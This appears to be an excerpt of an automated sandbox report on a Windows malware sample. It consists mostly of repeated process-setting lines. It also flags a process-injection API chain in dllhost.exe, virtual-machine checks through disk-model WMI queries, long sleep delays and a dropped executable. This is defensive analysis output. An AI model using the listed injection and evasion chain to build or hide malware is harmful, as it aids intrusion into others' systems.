Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,7_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5035Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4886Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2202Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 653Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6642Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8255Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 456Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 497Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 728Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 577Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8752Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 386Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 556Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 550Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 453Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 535Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 524Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 522Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 515Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 470Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1264Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 463Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 459Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 449Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 452Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 447Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3487
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 435
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 423
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 419
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 410
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1276
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 386
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 374
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 380
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 353
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1257
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\$nya-onimai2\MzWhoQ.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_7-612
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_7-615
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-574
Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.2 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 4.9 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.7 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 6.2 %
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep count: 5035 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep count: 4886 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 7128Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920Thread sleep count: 2202 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920Thread sleep time: -2202000s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1912Thread sleep count: 653 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1912Thread sleep time: -65300s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920Thread sleep count: 6642 > 30Jump to behavior
